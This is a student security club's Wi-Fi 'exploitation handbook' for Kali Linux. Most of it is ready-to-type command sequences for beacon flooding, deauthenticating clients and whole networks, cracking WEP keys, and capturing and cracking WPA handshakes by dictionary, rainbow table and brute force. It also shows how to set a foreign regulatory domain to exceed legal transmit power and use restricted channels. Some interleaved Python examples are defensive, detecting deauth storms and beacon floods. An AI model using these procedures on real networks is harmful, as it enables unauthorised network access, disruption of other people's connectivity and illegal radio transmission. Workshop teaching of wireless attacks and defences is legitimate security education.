Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook

The information provided in this manual is to be used for educational purposes only. The authors are in no way responsible for any misuse of the information provided. All of the information in this manual is meant to help the reader develop a Wi-Fi hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Any hacking discussed in this manual should be regarded as ethical hacking. You implement the information given at your own risk.

By reading the tutorials given in this manual, you agree that this tutorial is intended for educational purposes only and that the author cannot be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other, creative application of this tutorial. If you disagree with the above statement, stop here.

Note: All images, programs, and steps in this manual were tested and performed with the 32-bit Kali Linux version 1.0.6 live ISO downloaded from http://www.kali.org, installed to a USB flash drive with YUMI Multiboot USB Creator (available from http://www.pendrivelinux.com), and an Alfa AWUS036H USB wireless adapter on a laptop computer with an internal wireless card and an internal Ethernet card.

Any statement starting with a # character is meant to be run in the terminal.

Each section of this manual starts as if you have just freshly booted into Kali. You may not need to do the first steps in a section if you have already done work since booting your computer. Two examples of this are opening the terminal and starting monitor mode on wlan1 so that you already have a mon0 interface.

When text appears in quotes, that means not to type it verbatim but rather to substitute your own value for the quoted text. For example, "password" means to type what you want the password to be.

Table of Contents

Terms and Definitions .... 7
Getting to know Kali Linux .... 9
Initial Computer Setup .... 10
Tools Used in this manual .... 11
Finding the correct Wireless adapter .... 13
Finding your MAC address .... 14
Specifically changing your MAC address .... 15
Randomly changing your MAC address .... 17
Changing your MAC address back to the factory address .... 19
Changing the channel of your wireless card .... 20
Operating Wi-Fi outside US regulation frequencies .... 21
Operating your wireless card with more power .... 23
Finding the modes your wireless card supports .... 25
Operating your card in ad-hoc mode .... 26
Operating your card in monitor mode .... 28
Data gathering in monitor mode .... 29
Beacon Flooding .... 31
Viewing Probe Requests .... 33
Passive Network Scan .... 35
Active Network Scan .... 37
Directed Client Deauthentication .... 38
Directed Network Deauthentication .... 40
Multiple Network Deauthentication .... 42
Forced connection to a specific access point .... 44
Breaking WEP Encryption .... 46
Breaking WPA Encryption with a dictionary list .... 50
Breaking WPA Encryption with a rainbow table .... 54
Computing personalized Rainbow Tables .... 58
Breaking WPA Encryption by brute force .... 60
Charts and Figures .... 64

Terms and Definitions
Access Point (AP) - A device that allows wireless devices to connect to a wired network using Wi-Fi.
Bandwidth - The difference between the upper and lower frequencies in a continuous set of frequencies.
Channel - A pre-defined number assigned to a specific center frequency and bandwidth within the frequency range that Wi-Fi operates in. Within the US, channels 1-11 are available for use at higher powers.
Evil Twin - A rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but has actually been set up to eavesdrop on wireless communications.
Frequency - A rate of oscillation, which corresponds to radio waves and the alternating currents that carry radio signals.
Honeypot - A wireless access point intentionally set up to allow people to connect to it, for the purpose of monitoring traffic or for other malicious reasons.
IEEE 802.11 - A set of media access control and physical layer specifications for implementing wireless local area network computer communication in the 2.4 GHz, 3.6 GHz, 5 GHz, 60 GHz, and TV white space frequency bands.
IP Address - A numerical label assigned to each device participating in a computer network that uses the Internet Protocol for communication.
ISM Band - Radio bands reserved internationally for the use of radio frequency energy for industrial, scientific and medical purposes other than telecommunications. Despite the intent of the original allocations, and because there are multiple allocations, in recent years the fastest-growing uses of these bands have been for short-range, low-power communication systems.
MAC Address - A unique identifier assigned to network interfaces for communications on the physical network segment.
Modes - Different ways that the wireless card can function. These modes include master, managed, ad-hoc, mesh, repeater, and monitor. Master mode is used by wireless access points. Managed mode is used by clients to connect to a wireless network. Ad-hoc mode is used for creating a network directly between clients. Mesh mode is used in commercial applications to create ad-hoc networks between access points. Repeater mode is used to boost the range of a wireless access point. Monitor mode is used when wishing to view traffic that was not meant for your computer.
NIC - Short for network interface card. A computer hardware component that connects a computer to a computer network.
Packet - A formatted unit of data carried by a packet-switched network. A packet consists of two kinds of data: control information and user data (also known as payload). The control information provides data the network needs to deliver the user data, for example source and destination network addresses, error detection codes, and sequencing information. Typically, control information is found in packet headers and trailers, with payload data in between.
Rainbow Table - A pre-computed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a plaintext password up to a certain length consisting of a limited set of characters.
WEP - Wired Equivalent Privacy. An easily broken security algorithm for IEEE 802.11 wireless networks, introduced in 1999.
Wi-Fi - The trademarked name from the Wi-Fi Alliance for a popular technology that allows the wireless transfer of data based upon the IEEE 802.11 standard.
WPA - Wi-Fi Protected Access. A security protocol and security certification program developed by the Wi-Fi Alliance to secure wireless networks. WPA was designed to take the place of WEP.
WPA2 - Wi-Fi Protected Access II. A security protocol and security certification program developed by the Wi-Fi Alliance to secure wireless networks. WPA2 was designed to take the place of WPA.

Getting to know Kali Linux
Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni and Devon Kearns of Offensive Security developed it by rewriting BackTrack, their previous forensics Linux distribution. In addition to Kali Linux, Offensive Security also maintains the Exploit Database and the free online course Metasploit Unleashed.
Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), and Aircrack-ng (a software suite for penetration-testing wireless LANs). Users may run Kali Linux from a hard disk, live CD, or live USB. It is a supported platform of the Metasploit Project's Metasploit Framework, a tool for developing and executing security exploits.
Kali Linux is distributed in 32- and 64-bit images for use on hosts based on the x86 instruction set, as well as an image for the ARM architecture for use on the Raspberry Pi computer and on Samsung's ARM Chromebook.

Initial Computer Setup
1. With the computer off, plug in the USB flash drive with Kali Linux installed as well as the USB Alfa wireless card.
2. Turn on the computer and boot off of the USB. This will vary by computer manufacturer, but there will be a button to press before your computer boots off of the internal hard drive.
3. You should be brought to the YUMI multiboot USB start page. Using the arrow keys, select System Tools -> and hit enter.
4. You should be brought into the System Tools page of YUMI. Using the arrow keys, select kali-linux-1.0.6-i386 and hit enter.
5. You should be brought to the Kali Linux boot menu. Using the arrow keys, select Live (686-pae) and hit enter. Your computer is now booting off of the USB drive in live mode. This means that nothing is being written to the hard drive; in fact you could do this without a hard drive installed at all.
6. You should now be booted into Kali Linux and sitting at the desktop. Note that by default Kali runs in a single-user environment, meaning that you are root (the administrator). If Kali is left alone for a set amount of time it will lock the screen; the password for the root account is toor.
7. In order to enable the wireless cards, you must turn off airplane mode, which is enabled by default. Click Applications -> System Tools -> Preferences -> System Settings. From the System Settings select Network and then click on the Airplane Mode toggle switch to make sure it is off.
8. Your computer is now ready to proceed through this manual.

Tools used in this manual
aircrack-ng
  - http://www.aircrack-ng.org
  - A network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless networks.
aireplay-ng
  - http://www.aircrack-ng.org/doku.php?id=aireplay-ng
  - Used to inject frames and generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys.
airmon-ng
  - http://www.aircrack-ng.org/doku.php?id=airmon-ng
  - This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode.
airodump-ng
  - http://www.aircrack-ng.org/doku.php?id=airodump-ng
  - Used for packet capturing of raw 802.11 frames and particularly suitable for collecting WEP IVs (Initialization Vectors) for the intent of using them with aircrack-ng.
Jasager-karma
  - http://www.digininja.org/jasager/
  - KARMA-enabled access points passively listen to any client's wireless requests and then respond with the SSID that the client probed for, thus impersonating virtually any access point.
Kali Linux
  - http://www.kali.org/
  - A Debian-derived Linux distribution designed for digital forensics and penetration testing.
mdk3
  - http://homepages.tu-darmstadt.de/~p_larbig/wlan/
  - A program that uses the osdep injection library from the aircrack-ng project. Used for packet injection as well as numerous other Wi-Fi related attacks such as a wireless DDOS (directed denial of service) attack.
tshark
  - http://www.wireshark.org/
  - An open-source packet analyzer used for network troubleshooting, analysis, software and communication protocol development, and education.

Finding the correct wireless adapter
1. Open the terminal

2. Type #airmon-ng and hit enter

3. The interface with the Realtek RTL8187L is the interface that you want to use. In this case that interface is wlan1, because there is already an internal wireless card, which is wlan0. Your situation may be different; substitute the correct interface on your own computer wherever wlan1 is used in this manual.

Finding your MAC address
1. Open the terminal

2. Type #ifconfig wlan1

Specifically changing your MAC address
1. Open the terminal

2. Type #ifconfig wlan1 down

3. Type one of the following

#ifconfig wlan1 hw ether de:ad:be:ef:c0:fe
#macchanger -m de:ad:be:ef:c0:fe wlan1

4. Type #ifconfig wlan1 up

5. Type #ifconfig wlan1

****Notice that the MAC address is now different than if you were to run this command when the computer is first booted.

Randomly Changing your MAC Address
1. Open the terminal

2. Type #ifconfig wlan1 down

3. Type one of the following

#ifconfig wlan1 hw ether 96:de:3a:c5:3a:74 (specific random: an address you pick yourself)
#macchanger -r wlan1 (computer random: an address the computer picks)

4. Type #ifconfig wlan1 up

5. Type #ifconfig wlan1

****Notice that the MAC address is now different than if you were to run this command when the computer is first booted.

Changing your MAC address back to factory original
1. Open the terminal

2. Type #ifconfig wlan1 down

3. Type #macchanger -p wlan1

4. Type #ifconfig wlan1 up

5. Type #ifconfig wlan1

Changing the Channel of your wireless card
1. Open the terminal

2. Type #iwconfig wlan1

3. Type #iwconfig wlan1 channel "c"
"c" is the channel you wish to set

4. Type #iwconfig wlan1

****Notice that a Frequency section has been added and will change depending upon what channel you entered.

Operating Wi-Fi outside US regulation frequencies
1. Open the terminal

2. Type #iw reg get

3. Type #iw reg set JP

4. Type #iw reg get

5. Type #iwconfig wlan1 channel "c"
"c" is the channel you wish to use, 1-14

6. Type #iwconfig wlan1

****Notice that the frequency corresponds to channel 14, which is normally not available for use in the United States and is only used in Japan. The same holds for channels 12 and 13, which are not used with higher power in the US.

Operating your wireless card with more power
1. Open the terminal

2. Type #iwconfig wlan1

3. Type #iw reg set BO

4. Type #iwconfig wlan1 txpower 30

5. Type #iwconfig wlan1

****Notice that the Tx-Power has changed from 20 dBm to 30 dBm. This is a change from 0.1 Watt to 1 Watt.

The FCC regulation on ERP (Effective Radiated Power) depends on the use of the wireless link. A point-to-point wireless connection can have a greater ERP than a point-to-multipoint wireless link.

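The channel, regulatory-domain and transmit-power sections above each end with a check of iwconfig output. The following added example (not code from the handbook) encodes the arithmetic behind those checks so you can predict what iwconfig should show: the 2.4 GHz channel-to-frequency mapping including the irregular channel 14, the US and JP channel rules exactly as this handbook states them (nothing beyond that), and the dBm-to-watt conversion behind the 20 dBm to 30 dBm step.

```python
"""Arithmetic behind the iwconfig/iw checks in the channel, regulatory-domain
and txpower sections. Added example, not handbook code. The regulatory rules
encoded here are only what the handbook states (US: 1-11 full power, 12-13
reduced power, 14 unavailable; JP: 1-14), not a full regulatory database."""


def channel_to_mhz(ch: int) -> int:
    """Centre frequency that `iwconfig` reports for a channel.
    2.4 GHz channels 1-13 step 5 MHz up from 2412 MHz; channel 14 is the
    irregular one at 2484 MHz (12 MHz above channel 13), which is why it
    only fits the Japanese band plan. 5 GHz channels are 5000 + 5 * ch."""
    if 1 <= ch <= 13:
        return 2407 + 5 * ch
    if ch == 14:
        return 2484
    if 36 <= ch <= 165:
        return 5000 + 5 * ch
    raise ValueError(f"not a channel this example knows: {ch}")


# 2.4 GHz channel rules as stated in this handbook, keyed by `iw reg` country code.
REGDOM_24GHZ = {
    "US": {**{c: "full" for c in range(1, 12)}, 12: "reduced", 13: "reduced"},
    "JP": {c: "full" for c in range(1, 15)},
}


def channel_status(ch: int, regdom: str) -> str:
    """'full', 'reduced' or 'unavailable' for a 2.4 GHz channel in a domain."""
    return REGDOM_24GHZ[regdom].get(ch, "unavailable")


def dbm_to_watts(dbm: float) -> float:
    """Convert the Tx-Power value iwconfig prints (dBm) to watts:
    0 dBm is 1 mW and every +10 dBm is a tenfold increase."""
    return 10 ** ((dbm - 30) / 10)


def expected_iwconfig(ch: int, regdom: str, dbm: float) -> dict:
    """What `iwconfig wlan1` should show after the handbook's steps, plus
    whether the chosen channel is even usable in that regulatory domain."""
    return {
        "frequency_ghz": channel_to_mhz(ch) / 1000,
        "channel_status": channel_status(ch, regdom),
        "tx_power_watts": round(dbm_to_watts(dbm), 6),
    }


if __name__ == "__main__":
    # The handbook's own cases: channel 14 only after `iw reg set JP`,
    # and 20 dBm -> 30 dBm being a jump from 0.1 W to 1 W.
    print(expected_iwconfig(14, "US", 20))
    print(expected_iwconfig(14, "JP", 30))
```
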
Finding the modes your wireless card supports
1. Open the terminal

2. Type #airmon-ng

3. Type #iw phy phy0 info | grep -A3 modes

Notice that phy0 is the Realtek RTL8187L; this may vary on your computer.

Operating your wireless card in ad-hoc mode
Step 6 is optional, as it enables WEP security.
1. Open the terminal

2. Type #ifconfig wlan1 down

3. Type #iwconfig wlan1 mode ad-hoc

4. Type #iwconfig wlan1 channel 1

5. Type #iwconfig wlan1 essid "nameofnetwork"

6. Type #iwconfig wlan1 key s:"password"
Note that the password must work out to be 10 or 26 hexadecimal digits, which is equivalent to 5 or 13 ASCII characters.

7. Type #ifconfig wlan1 up

8. Type #iwconfig wlan1

Operating your card in monitor mode
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #iwconfig

****Notice that a new interface, mon0, has been created.

Data gathering in monitor mode
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #tshark -i mon0

You should see output listing every packet being sent across the given channel.

4. Type ctrl-c to end

5. Type #airodump-ng mon0

You should see two sections of output: the top section shows access points while the bottom shows client computers.

6. Type ctrl-c to end

Beacon Flooding
Beacons are a type of 802.11 (Wi-Fi) management frame. They are transmitted periodically by an access point to announce its presence and contain all of the information about a network (name, speeds, encryption type, etc.). We are able to send these frames even though the network does not exist.
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #nano ssidlist

4. Add different network names on new lines

5. Hit ctrl-x, then y, then enter when done entering network names

6. Type #mdk3 mon0 b -f ssidlist

7. Hit ctrl-c to quit when done sending beacons

****You can view these networks on a computer, but you cannot connect to them since they are not real.

Viewing Probe Requests
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

4. Type ctrl-c to stop

****Notice that this section of output is at the very bottom of the screen. If many access points are within range, you might have to zoom out while the program is running and then zoom back in after stopping it. The text zoom option is available from the View menu at the top of the screen.

Passive Network Scan
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #iw dev wlan1 scan passive | grep SSID

Active Network Scan
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #iwlist wlan1 scan | grep ESSID

Directed Client Deauthentication
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

This is when a target is chosen. The BSSID is the AP MAC and the STATION is the client MAC. The ESSID is the network name and the number under CH is the channel.

4. Type ctrl-c to quit

5. Type #iwconfig mon0 channel 11
11 is the channel of the AP from above

6. Type #aireplay-ng --ignore-negative-one -0 10 -a "AP MAC" -c "Client MAC" mon0

Directed Network Deauthentication
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

Choose your target network.

4. Type ctrl-c when finished

5. Type #nano blacklist

Put the target network's MAC address on its own line.

6. Type ctrl-x, Y, enter

7. Type #mdk3 mon0 d -b blacklist -c 11

11 is the channel of the access point

8. Type ctrl-c to stop

Multiple Network Deauthentication
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

Choose your target networks.

4. Type ctrl-c when finished

5. Type #nano blacklist

Put the target networks' MAC addresses on separate lines.

6. Type ctrl-x, Y, enter

7. Type #mdk3 mon0 d -b blacklist -c 6,11

6 and 11 are the channels of the access points

8. Type ctrl-c to stop

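The Beacon Flooding section and the three deauthentication sections above each produce a burst of management frames that a legitimate network never generates on its own, which is also what makes them easy to spot from the defending side. The following added example (not code from the handbook, mdk3 or aircrack-ng) runs two simple detectors over a constructed frame log shaped like airodump-ng/tshark output: a per-source deauthentication rate check and a new-BSSID rate check. The frame timings, thresholds and the 02:xx fake BSSIDs are constructed; the AP and client addresses are the ones used in this handbook.

```python
"""Toy wireless IDS checks for the two attacks in the Beacon Flooding and
Deauthentication sections. Added example, not handbook or mdk3/aircrack code.
Frames are (seconds, subtype, source MAC, destination MAC, SSID); the log
below is constructed, reusing the AP/client addresses from this handbook."""
from collections import defaultdict, deque

AP = "00:1a:c4:51:3c:31"       # handbook's WPA access point
CLIENT = "00:c0:ca:75:6f:ab"   # handbook's client station
BCAST = "ff:ff:ff:ff:ff:ff"

SAMPLE_FRAMES = sorted(
    [   # normal traffic: two real APs beaconing, one client sending data
        (0.00, "beacon", AP, BCAST, "acm_dictionary"),
        (0.10, "beacon", "12:18:0a:21:ae:e4", BCAST, "acm_wep"),
        (0.50, "data", CLIENT, AP, ""),
        (0.60, "deauth", AP, CLIENT, ""),   # a single deauth is normal (client left)
    ]
    # what `aireplay-ng -0 10` / `mdk3 d` looks like: many deauths to one client within a second
    + [(1.00 + 0.05 * i, "deauth", AP, CLIENT, "") for i in range(8)]
    # what `mdk3 b -f ssidlist` looks like: a dozen never-seen BSSIDs appearing within a second
    + [(2.00 + 0.02 * i, "beacon", f"02:00:00:00:00:{i:02x}", BCAST, f"fake-{i}") for i in range(12)]
)


def deauth_storms(frames, window=1.0, threshold=5):
    """Peak number of deauth frames per source MAC inside any sliding window.
    A real station deauthenticates once; dozens per second means forgery.
    Returns {source: peak} for sources whose peak exceeds `threshold`."""
    recent = defaultdict(deque)
    peaks = defaultdict(int)
    for t, subtype, src, _dst, _ssid in frames:
        if subtype != "deauth":
            continue
        q = recent[src]
        q.append(t)
        while t - q[0] > window:      # drop timestamps that fell out of the window
            q.popleft()
        peaks[src] = max(peaks[src], len(q))
    return {src: n for src, n in peaks.items() if n > threshold}


def beacon_flood(frames, window=1.0, threshold=10):
    """Peak number of BSSIDs seen for the first time inside any sliding window.
    Real APs show up once and stay; a flood is a stream of new ones.
    Returns (peak, flagged)."""
    seen, first_seen, peak = set(), deque(), 0
    for t, subtype, src, _dst, _ssid in frames:
        if subtype != "beacon" or src in seen:
            continue
        seen.add(src)
        first_seen.append(t)
        while t - first_seen[0] > window:
            first_seen.popleft()
        peak = max(peak, len(first_seen))
    return peak, peak >= threshold


if __name__ == "__main__":
    print("deauth storms:", deauth_storms(SAMPLE_FRAMES))
    print("beacon flood:", beacon_flood(SAMPLE_FRAMES))
```
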
Forced connection to a specific access point
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

Choose the AP that will remain accessible.

4. Type ctrl-c when finished finding the AP info

5. Type #nano whitelist

Put the MAC address of the AP chosen above in the file.

6. Type ctrl-x, Y, enter when finished

7. Type #mdk3 mon0 d -w whitelist

8. Type ctrl-c to stop

Breaking WEP Encryption
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

4. Type ctrl-c when a network has been found

5. Type #airodump-ng -c 6 -w acm_wep --bssid 12:18:0A:21:AE:E4 mon0

6. Open a new tab in the terminal (File -> New Tab)

7. Type #aireplay-ng --ignore-negative-one -1 0 -a 12:18:0A:21:AE:E4 -h 00:C0:CA:75:6F:AB mon0

8. Type #aireplay-ng --ignore-negative-one -3 -b 12:18:0A:21:AE:E4 -h 00:C0:CA:75:6F:AB mon0

9. Go back to the first tab and wait until the number in the #Data column reaches 40000. Note that this is not a set number, due to the statistical analysis that goes into breaking the key, and it can vary greatly depending upon the length of the key and several other factors. In this case it worked with ~55000.

10. Open a new tab in the terminal (File -> New Tab)

11. Type #aircrack-ng -b 12:18:0A:21:AE:E4 acm_wep-01.cap

12. If not successful, try again after the #Data column reaches the suggested number

13. When successful, aircrack-ng will print a message reporting the recovered key.

14. Go to each of the other tabs and type ctrl-c to stop the running program.

Breaking WPA Encryption with a dictionary list
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Kill the two processes that could cause trouble with the command #kill "pid"

"pid" is the PID from the airmon-ng program output above

4. Type #airodump-ng mon0

5. Type ctrl-c when finished finding the target

6. Type #airodump-ng -c 11 --bssid 00:1A:C4:51:3C:31 -w acm_dictionary mon0

7. Open a new tab in the terminal (File -> New Tab)

8. Type #iwconfig mon0 channel 11

9. Type #aireplay-ng --ignore-negative-one -0 10 -a "AP MAC" -c "Client MAC" mon0

10. Go back to the first tab and wait until "WPA handshake:" appears in the upper right. Then type ctrl-c to stop the collection of data.

This handshake is necessary to perform the password crack.

11. Make sure your dictionary file is in the same directory as your .cap file

12. Type #aircrack-ng acm_dictionary-01.cap -w english.txt

Breaking WPA Encryption with a Rainbow Table
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Kill the two processes that could cause trouble with the command #kill "pid"

"pid" is the PID from the airmon-ng program output above

4. Type #airodump-ng mon0

5. Type ctrl-c when finished finding the target

6. Type #airodump-ng -c 11 --bssid 00:1A:C4:51:3C:31 -w acm_dictionary mon0

7. Open a new tab in the terminal (File -> New Tab)

8. Type #iwconfig mon0 channel 11

9. Type #aireplay-ng --ignore-negative-one -0 10 -a "AP MAC" -c "Client MAC" mon0

10. Go back to the first tab and wait until "WPA handshake:" appears in the upper right. Then type ctrl-c to stop the collection of data.

This handshake is necessary to perform the password crack.

11. Make sure your rainbow table file is in the same directory as your .cap file

12. Type #cowpatty -r acm_dictionary-01.cap -d acm_dictionary_hash -s acm_dictionary

Computing personalized Rainbow Tables
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Type #airodump-ng mon0

4. Type ctrl-c when finished finding the target

5. Make sure your dictionary file is in your current directory

6. Type #genpmk -f English.txt -d acm_dictionary_hash -s acm_dictionary

7. When the program finishes running, the rainbow table will be saved in the current directory

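genpmk's -s option names the SSID because the WPA pairwise master key is derived from the passphrase with the SSID as salt, so a table is only valid for that one network name, which is also why a unique SSID plus a long passphrase is the defensive answer to both the rainbow-table and dictionary sections. The following added example (not code from the handbook, genpmk or cowpatty) computes the PMK the way IEEE 802.11i defines it, checks it against the standard's published test vector, and shows that a table built for one SSID does not transfer to another; the SSID strings and the short wordlist standing in for english.txt are constructed.

```python
"""WPA/WPA2-Personal PMK derivation, to show why a genpmk table is bound to one
SSID. Added example; not code from the handbook, genpmk or cowpatty."""
import hashlib

PBKDF2_ROUNDS = 4096   # fixed by IEEE 802.11i for WPA-PSK
PMK_LEN = 32           # 256-bit pairwise master key


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 rounds, 32 bytes).
    Because the SSID is the salt, every SSID needs its own table: a table
    built for "acm_dictionary" says nothing about a network named anything else."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), PBKDF2_ROUNDS, PMK_LEN
    )


def build_pmk_table(wordlist, ssid: str) -> dict:
    """What `genpmk -f wordlist -s ssid` precomputes: passphrase -> PMK for one
    SSID. The 4096 rounds per word are the cost paid up front and stored;
    words outside the 8-63 character range can never be WPA passphrases."""
    return {w: wpa_pmk(w, ssid) for w in wordlist if 8 <= len(w) <= 63}


def table_reusable(table: dict, other_ssid: str) -> bool:
    """True if any PMK in a table built for one SSID also matches under another.
    For two different SSIDs this is effectively never true, which is why a
    non-default, unique SSID defeats precomputed tables outright."""
    return any(pmk == wpa_pmk(w, other_ssid) for w, pmk in table.items())


# IEEE 802.11-2004 Annex H test vector: passphrase "password", SSID "IEEE".
IEEE_TEST_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

if __name__ == "__main__":
    assert wpa_pmk("password", "IEEE").hex() == IEEE_TEST_PMK
    # constructed wordlist standing in for english.txt
    words = ["password", "letmein1", "short", "acm-sig-security"]
    table = build_pmk_table(words, "acm_dictionary")
    print(len(table), "entries; reusable for another SSID:", table_reusable(table, "acm_wep"))
```
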
Breaking WPA Encryption by brute force
1. Open the terminal

2. Type #airmon-ng start wlan1

3. Kill the two processes that could cause trouble with the command #kill "pid"
"pid" is the PID from the airmon-ng program output above

4. Type #airodump-ng mon0

5. Type ctrl-c when finished finding the target

6. Type #airodump-ng -c 11 --bssid 00:1A:C4:51:3C:31 -w acm_dictionary mon0

7. Open a new tab in the terminal (File -> New Tab)

8. Type #iwconfig mon0 channel 11

9. Type #aireplay-ng --ignore-negative-one -0 10 -a "AP MAC" -c "Client MAC" mon0

10. Go back to the first tab and wait until "WPA handshake:" appears in the upper right. Then type ctrl-c to stop the collection of data.

This handshake is necessary to perform the password crack.

11. Type #john -stdout -incremental:all | aircrack-ng -b 00:1a:c4:51:3c:31 -w - acm_dictionary-01.cap

The - after -w tells aircrack-ng to read the candidate passwords from john's output instead of from a file.

12. Now you wait until the program has cracked the password. The given method will eventually break every password but would take an extremely long time. There are optimizations that could be made, for example if the length of the key was known. In making this manual, I did not wait until completion because of time constraints.

Charts and Figures
Wi-Fi channels in the 2.4 GHz band and 5 GHz band

802.11 Standards
